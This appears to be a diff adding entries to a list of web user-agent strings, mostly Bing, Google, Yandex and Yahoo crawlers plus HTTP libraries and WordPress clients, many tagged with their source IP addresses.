    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.51]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.190]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.240]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.93]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.59]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.132]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.179]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.164]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.141]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.188]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.169]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.81]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.3]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.129]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.222]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.36]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.25]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.137]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.85]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.148]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.20]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.43]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.237]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.232]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.137]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.124]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.33]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.75]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.58]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.16]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.136]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.1]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.130]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.243]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.30]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.41]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.152]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.127]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.34]
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36 PTST/201112.191139 [ip:34.106.249.213]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.138]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.109]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.202]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.51]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.35]
    +Go-http-client/1.1 [ip:213.32.4.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.204]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.40]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.209]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.72]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.173]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.5]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.106]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.97]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.137]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.6]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.106]
    +okhttp/3.12.5 [ip:217.171.66.47]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.214]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.183]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.10]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.246]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.10]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.34]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.105]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.31]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.157]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.89.248]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:66.249.89.246]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.89.250]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.75]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.32]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.255]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.35]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.113]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.124]
    +okhttp/3.2.0 [ip:177.86.20.78]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.66]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.22]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.32]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.197]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.29]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.76]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.27]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.166]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.23]
    +okhttp/3.12.5 [ip:5.77.100.196]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.63]
    +okhttp/3.12.5 [ip:151.82.217.98]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.58]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.52]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.111]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.123]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.46]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.211]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.218]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.28]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.38]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.38]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.9]
    +okhttp/3.12.5 [ip:62.18.166.216]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.49]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.4]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.33]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.69]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.65.185]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.121]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.236]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.236]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.39]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.175]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.218]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.27]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.48]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.190]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.250]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.11]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.13]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.60]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.147]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.23]
    +okhttp/3.11.0 [ip:79.50.207.43]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.77]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.119]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.222]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.217]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.84]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.58]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.183]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.232]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.53]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.45]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.55]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.70]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.214]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.202]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.119]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.208]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.43]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.158]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.135]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.87]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.15]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.152]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.189]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.242]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.83]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.84]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.89]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.118]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.59]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.253.111]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:213.180.203.184]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.128]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.145]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.146]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.95]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.115]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.118]
    +Python/3.8 aiohttp/3.7.2
    +
    +WordPress/5.5.3; https://wawplus.com
    +WordPress/5.0.3; http://www.lkxpz.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605326670-10
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.23]
    +Scrapy/2.4.0 (+https://scrapy.org)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605315117-0
    +WordPress/5.5.3; http://softwarevan.com
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.6]
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 7.0; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +Google Chrome 60 (Win 10 x64): Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2785.116 Safari/537.36
    +ArchiveTeam ArchiveBot/20201108.751450d (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
    +python-requests/2.7.0 CPython/2.7.17 Windows/10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1; IdeaTabA1000-G ) U2/1.0.0 Mobile
    +facebookexternalhit/1.1(+http://www.facebook.com/externalhit_uatext.php)+Chromium/80.0.3987.163 Chrome/80.0.3987.163 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605366575-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605366576-0
    +Java/1.8.0_275
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605482589-0
    +WordPress/5.4.4; https://urfix.ru
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.44]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605483999-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605410375-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605414822-0
    +WordPress/5.5.3; https://hothup.com
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.223]
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 9; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605471549-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605471609-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1605460554-60
    +ArchiveTeam ArchiveBot/20201114.c4a2a56 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605471549-60
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.2; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605471548-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1605461893-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605471549-10
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.207]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.251]
    +okhttp/3.12.5 [ip:176.200.247.218]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.19]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.200]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.160]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.45]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.21]
